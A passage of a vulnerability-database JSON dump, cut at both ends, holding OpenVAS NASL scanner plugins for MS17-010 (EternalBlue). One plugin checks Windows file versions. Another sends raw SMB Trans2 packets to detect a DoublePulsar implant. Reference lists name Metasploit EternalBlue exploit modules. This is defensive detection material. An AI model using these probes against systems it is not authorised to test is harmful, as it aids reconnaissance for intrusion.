test_version2:\"11.0.14393.952\"))\n {\n Vulnerable_range = \"11.0.14393.0 - 11.0.14393.952\";\n VULN = TRUE ;\n }\n\n if(VULN)\n {\n report = 'File checked: ' + sysPath + \"\\Edgehtml.dll\" + '\\n' +\n 'File version: ' + edgeVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range + '\\n' ;\n security_message(data:report);\n exit(0);\n }\n}\n", "naslFamily": "Windows : Microsoft Bulletins"}, "differentElements": ["modified", "sourceData"], "edition": 7, "lastseen": "2019-05-29T18:34:05"}], "viewCount": 5816, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96703", "SMNTC-96706", "SMNTC-96707", "SMNTC-96705", "SMNTC-96709"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0205", "CPAI-2017-0203", "CPAI-2017-0177", "CPAI-2017-0419", "CPAI-2017-0200", "CPAI-2017-0198"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2020-06-08T23:21:25", "rev": 2}, "score": {"value": 8.4, "vector": "NONE", "modified": "2020-06-08T23:21:25", "rev": 2}}, "objectVersion": "1.5", "pluginID": "1361412562310810810", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows SMB Server Multiple Vulnerabilities (4013389)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810810\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0143\", \"CVE-2017-0144\", \"CVE-2017-0145\", \"CVE-2017-0146\",\n \"CVE-2017-0147\", \"CVE-2017-0148\");\n script_bugtraq_id(96703, 96704, 96705, 96707, 96709, 96706);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-03-15 09:07:19 +0530 (Wed, 15 Mar 2017)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Microsoft Windows SMB Server Multiple Vulnerabilities (4013389)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an critical security\n update according to Microsoft Bulletin MS17-010(WannaCrypt)\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to the way that the\n Microsoft Server Message Block 1.0 (SMBv1) server handles certain\n requests(WannaCrypt).\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to gain the ability to execute code on the target server, also could\n lead to information disclosure from the server.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 2003 x32/x64 Service Pack 2 and prior\n\n - Microsoft Windows XP SP2 x64\n\n - Microsoft Windows XP SP3 x86\n\n - Microsoft Windows 8 x86/x64\n\n - Microsoft Windows 10 x32/x64\n\n - Microsoft Windows Server 2012\n\n - Microsoft Windows Server 2016\n\n - Microsoft Windows 8.1 x32/x64\n\n - Microsoft Windows Server 2012 R2\n\n - Microsoft Windows 7 x32/x64 Service Pack 1\n\n - Microsoft Windows Vista x32/x64 Service Pack 2\n\n - Microsoft Windows Server 2008 R2 x64 Service Pack 1\n\n - Microsoft Windows Server 2008 x32/x64 Service Pack 2\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-in/kb/4013078\");\n script_xref(name:\"URL\", value:\"https://technet.microsoft.com/library/security/MS17-010\");\n script_xref(name:\"URL\", value:\"http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598\");\n script_xref(name:\"URL\", value:\"https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(xp:4, xpx64:3, win2003:3, win2003x64:3, win8:1, win8x64:1,\n winVista:3, win7:2, win7x64:2, win2008:3, win2008r2:2,\n winVistax64:3, win2008x64:3, win2012:1, win2012R2:1, win8_1:1, win8_1x64:1,\n win10:1, win10x64:1, win2016:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nvistVer = fetch_file_version(sysPath:sysPath, file_name:\"drivers\\srv.sys\");\nif(vistVer)\n{\n if(hotfix_check_sp(winVista:3, winVistax64:3, win2008:3, win2008x64:3) > 0)\n {\n if(version_is_less(version:vistVer, test_version:\"6.0.6002.19743\"))\n {\n Vulnerable_range1 = \"Less than 6.0.6002.19743\";\n VULN1 = TRUE ;\n }\n\n else if(version_in_range(version:vistVer, test_version:\"6.0.6002.22000\", test_version2:\"6.0.6002.24066\"))\n {\n Vulnerable_range1 = \"6.0.6002.22000 - 6.0.6002.24066\";\n VULN1 = TRUE ;\n }\n }\n\n ## http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598\n else if(hotfix_check_sp(xp:4) > 0)\n {\n if(version_is_less(version:vistVer, test_version:\"5.1.2600.7208\"))\n {\n Vulnerable_range1 = \"Less than 5.1.2600.7208\";\n VULN1 = TRUE ;\n }\n }\n\n ## http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598\n else if(hotfix_check_sp(win2003:3, win2003x64:3, xpx64:3) > 0)\n {\n if(version_is_less(version:vistVer, test_version:\"5.2.3790.6021\"))\n {\n Vulnerable_range1 = \"Less than 5.2.3790.6021\";\n VULN1 = TRUE ;\n }\n }\n\n ## http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598\n else if(hotfix_check_sp(win8:1, win8x64:1) > 0)\n {\n if(version_is_less(version:vistVer, test_version:\"6.2.9200.22099\"))\n {\n Vulnerable_range1 = \"Less than 6.2.9200.22099\";\n VULN1 = TRUE ;\n }\n }\n\n if(VULN1)\n {\n report = 'File checked: ' + sysPath + \"\\drivers\\srv.sys\" + '\\n' +\n 'File version: ' + vistVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range1 + '\\n' ;\n security_message(data:report);\n exit(0);\n }\n}\n\nwinVer = fetch_file_version(sysPath:sysPath, file_name:\"Win32k.sys\");\nif(winVer)\n{\n if(hotfix_check_sp(win7:2, win7x64:2, win2008r2:2) > 0 && winVer)\n {\n if(version_is_less(version:winVer, test_version:\"6.1.7601.23677\"))\n {\n Vulnerable_range = \"Less than 6.1.7601.23677\";\n VULN = TRUE ;\n }\n }\n\n else if(hotfix_check_sp(win2012:1) > 0)\n {\n if(version_is_less(version:winVer, test_version:\"6.2.9200.22097\"))\n {\n Vulnerable_range = \"Less than 6.2.9200.22097\";\n VULN = TRUE ;\n }\n }\n\n else if(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1) > 0)\n {\n if(version_is_less(version:winVer, test_version:\"6.3.9600.18603\"))\n {\n Vulnerable_range = \"Less than 6.3.9600.18603\";\n VULN = TRUE ;\n }\n }\n\n if(VULN)\n {\n report = 'File checked: ' + sysPath + \"\\win32k.sys\" + '\\n' +\n 'File version: ' + winVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range + '\\n' ;\n security_message(data:report);\n exit(0);\n }\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"Edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(hotfix_check_sp(win10:1, win10x64:1, win2016:1) > 0)\n{\n if(version_is_less(version:edgeVer, test_version:\"11.0.10240.17319\"))\n {\n Vulnerable_range = \"Less than 11.0.10240.17319\";\n VULN = TRUE ;\n }\n\n else if(version_in_range(version:edgeVer, test_version:\"11.0.10586.0\", test_version2:\"11.0.10586.838\"))\n {\n Vulnerable_range = \"11.0.10586.0 - 11.0.10586.838\";\n VULN = TRUE ;\n }\n\n else if(version_in_range(version:edgeVer, test_version:\"11.0.14393.0\", test_version2:\"11.0.14393.952\"))\n {\n Vulnerable_range = \"11.0.14393.0 - 11.0.14393.952\";\n VULN = TRUE ;\n }\n\n if(VULN)\n {\n report = 'File checked: ' + sysPath + \"\\Edgehtml.dll\" + '\\n' +\n 'File version: ' + edgeVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range + '\\n' ;\n security_message(data:report);\n exit(0);\n }\n}\n", "naslFamily": "Windows : Microsoft Bulletins", "_object_type": "robots.models.openvas.OpenVASBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.openvas.OpenVASBulletin"], "immutableFields": [], "cvss2": {}, "cvss3": {}}, {"id": "OPENVAS:1361412562310810698", "hash": "7604514bf5cf58b6f0da40f51ee83e51", "type": "openvas", "bulletinFamily": "scanner", "title": "Double Pulsar Infection Detect", "description": "This host is vulnerable to ", "published": "2017-04-18T00:00:00", "modified": "2019-05-03T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810698", "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "references": ["https://technet.microsoft.com/library/security/MS17-010", "https://github.com/countercept/doublepulsar-detection-script", "http://blog.binaryedge.io/2017/04/21/doublepulsar", "https://isc.sans.edu/forums/diary/Detecting+SMB+Covert+Channel+Double+Pulsar/22312"], "cvelist": ["CVE-2017-0147", "CVE-2017-0146"], "lastseen": "2019-05-29T18:33:53", "history": [{"bulletin": {"id": "OPENVAS:1361412562310810698", "hash": "8d5fa3486aa9217e51225842c66de08a56e5899081dc72404f9f4fbca5e0c4e8", "type": "openvas", "bulletinFamily": "scanner", "title": "Double Pulsar Infection Detect", "description": "This host is vulnerable to ", "published": "2017-04-18T00:00:00", "modified": "2018-10-17T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810698", "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "references": ["https://technet.microsoft.com/library/security/MS17-010", "https://github.com/countercept/doublepulsar-detection-script", "http://blog.binaryedge.io/2017/04/21/doublepulsar", "https://isc.sans.edu/forums/diary/Detecting+SMB+Covert+Channel+Double+Pulsar/22312"], "cvelist": ["CVE-2017-0147", "CVE-2017-0146"], "lastseen": "2018-10-22T16:34:04", "history": [], "viewCount": 24, "enchantments": {"dependencies": {"modified": "2018-10-22T16:34:04", "references": [{"idList": ["KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"], "type": "securelist"}, {"idList": ["SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"], "type": "metasploit"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["CVE-2017-0147", "CVE-2017-0146"], "type": "cve"}, {"idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["MS17_010"], "type": "canvas"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:7E6831E46F8BB1882B752045F527ABE6"], "type": "trendmicroblog"}, {"idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["SMNTC-96709", "SMNTC-96707"], "type": "symantec"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:142181", "PACKETSTORM:142548"], "type": "packetstorm"}]}, "score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "pluginID": "1361412562310810698", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_doublepulsar_infection_detect.nasl 11936 2018-10-17 09:05:37Z mmartin $\n#\n# Double Pulsar Infection Detect\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n# Antu Sanadi <santu@secpod.com> on 2017-06-28Fixed the validation issues.\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810698\");\n script_version(\"$Revision: 11936 $\");\n script_cve_id(\"CVE-2017-0146\", \"CVE-2017-0147\");\n script_bugtraq_id(96707, 96709);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-17 11:05:37 +0200 (Wed, 17 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-04-18 15:25:17 +0530 (Tue, 18 Apr 2017)\");\n script_tag(name:\"qod_type\", value:\"remote_active\");\n script_name(\"Double Pulsar Infection Detect\");\n\n script_tag(name:\"summary\", value:\"This host is vulnerable to 'Eternalblue'\n tool attack and is prone to remote code-execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send an SMB trans2 session setup request\n and check for presence of Multiplex ID '0x51' in the response.\");\n\n script_tag(name:\"insight\", value:\"An SMBv1 (Server Message Block 1.0) exploit\n that could trigger a RCE in older versions of Windows dubbed as 'ETERNALBLUE'\n has been discovered in latest dump of NSA Tools. One covert channel, 'double\n pulsar', is designed to particular for systems that are vulnerable to Eternalblue.\n The covert channel uses SMB features that have so far been not used, in\n particular, the 'Trans2' feature.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute arbitrary code on the affected system. Failed attacks\n will cause denial of service conditions.\");\n\n script_tag(name:\"affected\", value:\"All Windows Platforms from Windows XP\n through Windows 2012\");\n\n script_tag(name:\"solution\", value:\"Run Windows Update and update the\n listed hotfixes or download and update mentioned hotfixes in the advisory\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://github.com/countercept/doublepulsar-detection-script\");\n script_xref(name:\"URL\", value:\"https://isc.sans.edu/forums/diary/Detecting+SMB+Covert+Channel+Double+Pulsar/22312\");\n script_xref(name:\"URL\", value:\"http://blog.binaryedge.io/2017/04/21/doublepulsar\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"gb_smb_version_detect.nasl\", \"os_detection.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"smb_v1/supported\", \"Host/runs_windows\");\n script_xref(name:\"URL\", value:\"https://technet.microsoft.com/library/security/MS17-010\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"host_details.inc\");\n\nname = kb_smb_name();\nsmbPort = kb_smb_transport();\nif(!name || !smbPort){\n exit(0);\n}\n\nsoc = open_sock_tcp( smbPort );\nif( ! soc ) exit( 0 );\n\n## SMB Negotiate Protocol Request\nsmb_neg_req = raw_string(0x00, 0x00, 0x00, 0x85, 0xff, 0x53, 0x4d, 0x42,\n 0x72, 0x00, 0x00, 0x00, 0x00, 0x18, 0x53, 0xc0,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xfe,\n 0x00, 0x00, 0x40, 0x00, 0x00, 0x62, 0x00, 0x02,\n 0x50, 0x43, 0x20, 0x4e, 0x45, 0x54, 0x57, 0x4f,\n 0x52, 0x4b, 0x20, 0x50, 0x52, 0x4f, 0x47, 0x52,\n 0x41, 0x4d, 0x20, 0x31, 0x2e, 0x30, 0x00, 0x02,\n 0x4c, 0x41, 0x4e, 0x4d, 0x41, 0x4e, 0x31, 0x2e,\n 0x30, 0x00, 0x02, 0x57, 0x69, 0x6e, 0x64, 0x6f,\n 0x77, 0x73, 0x20, 0x66, 0x6f, 0x72, 0x20, 0x57,\n 0x6f, 0x72, 0x6b, 0x67, 0x72, 0x6f, 0x75, 0x70,\n 0x73, 0x20, 0x33, 0x2e, 0x31, 0x61, 0x00, 0x02,\n 0x4c, 0x4d, 0x31, 0x2e, 0x32, 0x58, 0x30, 0x30,\n 0x32, 0x00, 0x02, 0x4c, 0x41, 0x4e, 0x4d, 0x41,\n 0x4e, 0x32, 0x2e, 0x31, 0x00, 0x02, 0x4e, 0x54,\n 0x20, 0x4c, 0x4d, 0x20, 0x30, 0x2e, 0x31, 0x32,\n 0x00);\n\n## SMB Negotiate Protocol Response\nsend( socket:soc, data:smb_neg_req );\nsmb_neg_resp = smb_recv( socket:soc );\nif(strlen(smb_neg_resp) < 9 || !ord(smb_neg_resp[9])==0)\n{\n close( soc );\n exit( 0 );\n}\n\n\n## SMB Session Setup AndX Request,Anonymous User\nsmb_sess_req = raw_string(0x00, 0x00, 0x00, 0x88, 0xff, 0x53, 0x4d, 0x42,\n 0x73, 0x00, 0x00, 0x00, 0x00, 0x18, 0x07, 0xc0,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xfe,\n 0x00, 0x00, 0x40, 0x00, 0x0d, 0xff, 0x00, 0x88,\n 0x00, 0x04, 0x11, 0x0a, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0xd4, 0x00, 0x00, 0x00, 0x4b,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x57, 0x00,\n 0x69, 0x00, 0x6e, 0x00, 0x64, 0x00, 0x6f, 0x00,\n 0x77, 0x00, 0x73, 0x00, 0x20, 0x00, 0x32, 0x00,\n 0x30, 0x00, 0x30, 0x00, 0x30, 0x00, 0x20, 0x00,\n 0x32, 0x00, 0x31, 0x00, 0x39, 0x00, 0x35, 0x00,\n 0x00, 0x00, 0x57, 0x00, 0x69, 0x00, 0x6e, 0x00,\n 0x64, 0x00, 0x6f, 0x00, 0x77, 0x00, 0x73, 0x00,\n 0x20, 0x00, 0x32, 0x00, 0x30, 0x00, 0x30, 0x00,\n 0x30, 0x00, 0x20, 0x00, 0x35, 0x00, 0x2e, 0x00,\n 0x30, 0x00, 0x00, 0x00);\n\n## Session Setup AndX Response\nsend( socket:soc, data:smb_sess_req );\nsmb_sess_resp = smb_recv( socket:soc );\nif(strlen(smb_sess_resp) < 9 || !ord(smb_sess_resp[9])==0)\n{\n close( soc );\n exit( 0 );\n}\n\n##Extract UID from Session Setup AndX Response\nif(smb_sess_resp)\n{\n uid_low = ord(smb_sess_resp[32]);\n uid_high = ord(smb_sess_resp[33]);\n uid = uid_high * 256;\n uid += uid_low;\n}\n\n## SMB Tree Connect AndX Request, Path: \\\\xxx.xxx.xxx.xxx\\IPC$\nsmb_tree_resp = smb_tconx( soc:soc, name:name, uid:uid, share:\"IPC$\" );\nif(strlen(smb_tree_resp) < 9 || !ord(smb_tree_resp[9])==0)\n{\n close( soc );\n exit( 0 );\n}\n\n##Extract Tree ID from SMB Tree Connect Response\nif(smb_tree_resp)\n{\n tid_low = ord(smb_tree_resp[28] );\n tid_high = ord(smb_tree_resp[29] );\n}\n\n## SMB TRANS2 Request\nsmbtrans2_request = raw_string(0x00, 0x00, 0x00, 0x4e, 0xff, 0x53, 0x4d, 0x42,\n 0x32, 0x00, 0x00, 0x00, 0x00, 0x18, 0x07, 0xc0,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00) + raw_string(tid_low, tid_high) +\n raw_string(0xff, 0xfe) + raw_string(uid_low, uid_high) +\n raw_string(0x41, 0x00, 0x0f, 0x0c, 0x00, 0x00,\n 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0xa6, 0xd9, 0xa4, 0x00, 0x00, 0x00, 0x0c,\n 0x00, 0x42, 0x00, 0x00, 0x00, 0x4e, 0x00, 0x01,\n 0x00, 0x0e, 0x00, 0x0d, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00 );\n\nsend( socket:soc, data: smbtrans2_request);\n\n##Trans2 Response, SESSION_SETUP, Error: STATUS_NOT_IMPLEMENTED\nsmb_trans2_resp = smb_recv( socket:soc );\nif(strlen(smb_trans2_resp) < 34)\n{\n close( soc );\n exit( 0 );\n}\n\n##The intent of this request is to check if the system is already compromised.\n##Infected or not, the system will respond with a \"Not Implemented\" message.\nif(smb_trans2_resp && (ord(smb_trans2_resp[9])==2 && ord(smb_trans2_resp[10])==0\n && ord(smb_trans2_resp[11])==0 && ord(smb_trans2_resp[12])==192))\n{\n ##As part of the message, a \"Multiplex ID\" is returned.\n ##For normal systems it is 65 (0x41) and for infected systems it is 81 (0x51).\n if(ord(smb_trans2_resp[34]) == 81)\n {\n security_message(port:smbPort );\n close(soc);\n exit(0);\n }\n}\nclose(soc);\n", "naslFamily": "Windows : Microsoft Bulletins"}, "differentElements": ["modified", "sourceData"], "edition": 6, "lastseen": "2018-10-22T16:34:04"}, {"bulletin": {"id": "OPENVAS:1361412562310810698", "hash": "3f89e1e2b68ecdb7e1324587cc5cdd4f55120134c0bccf99df95907412aa3479", "type": "openvas", "bulletinFamily": "scanner", "title": "Double Pulsar Infection Detect", "description": "This host is vulnerable to ", "published": "2017-04-18T00:00:00", "modified": "2017-04-18T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": 